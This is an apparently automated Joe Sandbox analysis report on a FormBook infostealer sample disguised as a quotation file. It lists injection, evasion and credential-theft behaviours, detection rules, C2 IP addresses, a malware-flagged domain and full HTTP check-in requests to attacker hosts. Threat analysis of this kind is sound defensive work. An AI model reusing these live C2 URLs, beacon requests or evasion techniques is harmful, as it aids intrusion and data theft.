Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATON-37839993.exe

Overview

General Information

Sample name:QUOTATON-37839993.exe
Analysis ID:1569778
MD5:4fff9ad3ccf6625dc0287e4ba41f0184
SHA1:a3b82d53b251831f76e70c02c7ecf7b33741650f
SHA256:f001831d4c2b9ff4970e74f952942525cd7a14578f64e39f7a360b94a9f84a73
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • QUOTATON-37839993.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\QUOTATON-37839993.exe" MD5: 4FFF9AD3CCF6625DC0287E4BA41F0184)
    • svchost.exe (PID: 7204 cmdline: "C:\Users\user\Desktop\QUOTATON-37839993.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FOBNeEFwBsF.exe (PID: 3204 cmdline: "C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • comp.exe (PID: 7940 cmdline: "C:\Windows\SysWOW64\comp.exe" MD5: 712EF348F7032AA1C80D24600BA5452D)
          • FOBNeEFwBsF.exe (PID: 5000 cmdline: "C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8084 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.svchost.exe.2640000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.svchost.exe.2640000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\QUOTATON-37839993.exe", CommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", ParentImage: C:\Users\user\Desktop\QUOTATON-37839993.exe, ParentProcessId: 6712, ParentProcessName: QUOTATON-37839993.exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", ProcessId: 7204, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\QUOTATON-37839993.exe", CommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", ParentImage: C:\Users\user\Desktop\QUOTATON-37839993.exe, ParentProcessId: 6712, ParentProcessName: QUOTATON-37839993.exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATON-37839993.exe", ProcessId: 7204, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-06T10:05:31.408001+010020507451Malware Command and Control Activity Detected192.168.2.64985738.47.233.2180TCP
                2024-12-06T10:05:56.367744+010020507451Malware Command and Control Activity Detected192.168.2.649918104.21.7.18780TCP
                2024-12-06T10:06:13.136575+010020507451Malware Command and Control Activity Detected192.168.2.649962206.238.89.11980TCP
                2024-12-06T10:06:27.894773+010020507451Malware Command and Control Activity Detected192.168.2.64999966.29.149.4680TCP
                2024-12-06T10:06:43.025524+010020507451Malware Command and Control Activity Detected192.168.2.650026217.70.184.5080TCP
                2024-12-06T10:06:58.786529+010020507451Malware Command and Control Activity Detected192.168.2.65003013.228.81.3980TCP
                2024-12-06T10:07:13.738566+010020507451Malware Command and Control Activity Detected192.168.2.650035199.59.243.22780TCP
                2024-12-06T10:07:29.655370+010020507451Malware Command and Control Activity Detected192.168.2.650039172.67.178.9380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-06T10:05:31.408001+010028554651A Network Trojan was detected192.168.2.64985738.47.233.2180TCP
                2024-12-06T10:05:56.367744+010028554651A Network Trojan was detected192.168.2.649918104.21.7.18780TCP
                2024-12-06T10:06:13.136575+010028554651A Network Trojan was detected192.168.2.649962206.238.89.11980TCP
                2024-12-06T10:06:27.894773+010028554651A Network Trojan was detected192.168.2.64999966.29.149.4680TCP
                2024-12-06T10:06:43.025524+010028554651A Network Trojan was detected192.168.2.650026217.70.184.5080TCP
                2024-12-06T10:06:58.786529+010028554651A Network Trojan was detected192.168.2.65003013.228.81.3980TCP
                2024-12-06T10:07:13.738566+010028554651A Network Trojan was detected192.168.2.650035199.59.243.22780TCP
                2024-12-06T10:07:29.655370+010028554651A Network Trojan was detected192.168.2.650039172.67.178.9380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-06T10:05:48.268092+010028554641A Network Trojan was detected192.168.2.649899104.21.7.18780TCP
                2024-12-06T10:05:50.924364+010028554641A Network Trojan was detected192.168.2.649905104.21.7.18780TCP
                2024-12-06T10:05:53.580707+010028554641A Network Trojan was detected192.168.2.649912104.21.7.18780TCP
                2024-12-06T10:06:05.092186+010028554641A Network Trojan was detected192.168.2.649939206.238.89.11980TCP
                2024-12-06T10:06:07.740586+010028554641A Network Trojan was detected192.168.2.649947206.238.89.11980TCP
                2024-12-06T10:06:10.393360+010028554641A Network Trojan was detected192.168.2.649956206.238.89.11980TCP
                2024-12-06T10:06:19.912720+010028554641A Network Trojan was detected192.168.2.64997766.29.149.4680TCP
                2024-12-06T10:06:22.579528+010028554641A Network Trojan was detected192.168.2.64998566.29.149.4680TCP
                2024-12-06T10:06:25.230863+010028554641A Network Trojan was detected192.168.2.64999366.29.149.4680TCP
                2024-12-06T10:06:35.015331+010028554641A Network Trojan was detected192.168.2.650016217.70.184.5080TCP
                2024-12-06T10:06:37.684527+010028554641A Network Trojan was detected192.168.2.650022217.70.184.5080TCP
                2024-12-06T10:06:40.442513+010028554641A Network Trojan was detected192.168.2.650025217.70.184.5080TCP
                2024-12-06T10:06:50.722386+010028554641A Network Trojan was detected192.168.2.65002713.228.81.3980TCP
                2024-12-06T10:06:53.394332+010028554641A Network Trojan was detected192.168.2.65002813.228.81.3980TCP
                2024-12-06T10:06:56.050566+010028554641A Network Trojan was detected192.168.2.65002913.228.81.3980TCP
                2024-12-06T10:07:05.771308+010028554641A Network Trojan was detected192.168.2.650032199.59.243.22780TCP
                2024-12-06T10:07:08.427626+010028554641A Network Trojan was detected192.168.2.650033199.59.243.22780TCP
                2024-12-06T10:07:11.088789+010028554641A Network Trojan was detected192.168.2.650034199.59.243.22780TCP
                2024-12-06T10:07:20.894779+010028554641A Network Trojan was detected192.168.2.650036172.67.178.9380TCP
                2024-12-06T10:07:23.551499+010028554641A Network Trojan was detected192.168.2.650037172.67.178.9380TCP
                2024-12-06T10:07:26.207724+010028554641A Network Trojan was detected192.168.2.650038172.67.178.9380TCP
                2024-12-06T10:07:36.229146+010028554641A Network Trojan was detected192.168.2.650040172.67.192.20780TCP
                2024-12-06T10:07:38.894686+010028554641A Network Trojan was detected192.168.2.650041172.67.192.20780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgBAvira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/dc08/Avira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z35TM8/OCjKyI0RRWf5xhtUunUrv8dIQZV5rCv+EV3icANGbLYtw=&T2M=Y0Z0GAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: QUOTATON-37839993.exeReversingLabs: Detection: 47%
                Source: QUOTATON-37839993.exeVirustotal: Detection: 30%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.2640000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.2640000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4008790036.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4008647896.0000000002CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2590442326.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: QUOTATON-37839993.exeJoe Sandbox ML: detected
                Source: QUOTATON-37839993.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: comp.pdb source: svchost.exe, 00000004.00000002.2589804983.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2555676008.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4007947840.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FOBNeEFwBsF.exe, 0000000C.00000000.2513093798.000000000023E000.00000002.00000001.01000000.00000005.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4007354281.000000000023E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: comp.pdbGCTL source: svchost.exe, 00000004.00000002.2589804983.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2555676008.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4007947840.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: QUOTATON-37839993.exe, 00000000.00000003.2177200855.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, QUOTATON-37839993.exe, 00000000.00000003.2179147356.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2498213915.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2496001332.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2592572383.0000000003541000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.000000000388E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2590065626.000000000339D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: QUOTATON-37839993.exe, 00000000.00000003.2177200855.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, QUOTATON-37839993.exe, 00000000.00000003.2179147356.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.2589991575.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2498213915.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2589991575.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2496001332.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, comp.exe, comp.exe, 0000000D.00000002.4009038587.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2592572383.0000000003541000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009038587.000000000388E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2590065626.000000000339D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: comp.exe, 0000000D.00000002.4007580490.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000000.2660957083.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2882417343.00000000334AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: comp.exe, 0000000D.00000002.4007580490.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000000.2660957083.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2882417343.00000000334AC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E6445A
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6C6D1 FindFirstFileW,FindClose,0_2_00E6C6D1
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E6C75C
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6EF95
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E6F0F2
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6F3F3
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E637EF
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E63B12
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E6BCBC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E7C420 FindFirstFileW,FindNextFileW,FindClose,13_2_02E7C420
                Source: C:\Windows\SysWOW64\comp.exeCode function: 4x nop then xor eax, eax13_2_02E69F20
                Source: C:\Windows\SysWOW64\comp.exeCode function: 4x nop then pop edi13_2_02E6E0FB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 4x nop then mov ebx, 00000004h13_2_03490528

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49857 -> 38.47.233.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49857 -> 38.47.233.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49899 -> 104.21.7.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49905 -> 104.21.7.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49947 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49962 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49918 -> 104.21.7.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49962 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49918 -> 104.21.7.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49912 -> 104.21.7.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49956 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49939 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49977 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50026 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50026 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50030 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50030 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50035 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50035 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 172.67.178.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50039 -> 172.67.178.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50039 -> 172.67.178.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 172.67.192.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50041 -> 172.67.192.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 172.67.178.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50038 -> 172.67.178.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 217.70.184.50:80
                Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00E722EE
                Source: global trafficHTTP traffic detected: GET /t67p/?T2M=Y0Z0G&KxZ=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK+0pIYn6OsKXO6mwWbUGH3YR5hyu6M0h3PqYDwJCf+R1lkRh9UQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.qqa79.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /vjnn/?KxZ=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2C1TuTspqujhZjoi+NfkMLWXoMO10ul5nspQNZd1SB2qR4JUaa0=&T2M=Y0Z0G HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.gk88top.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
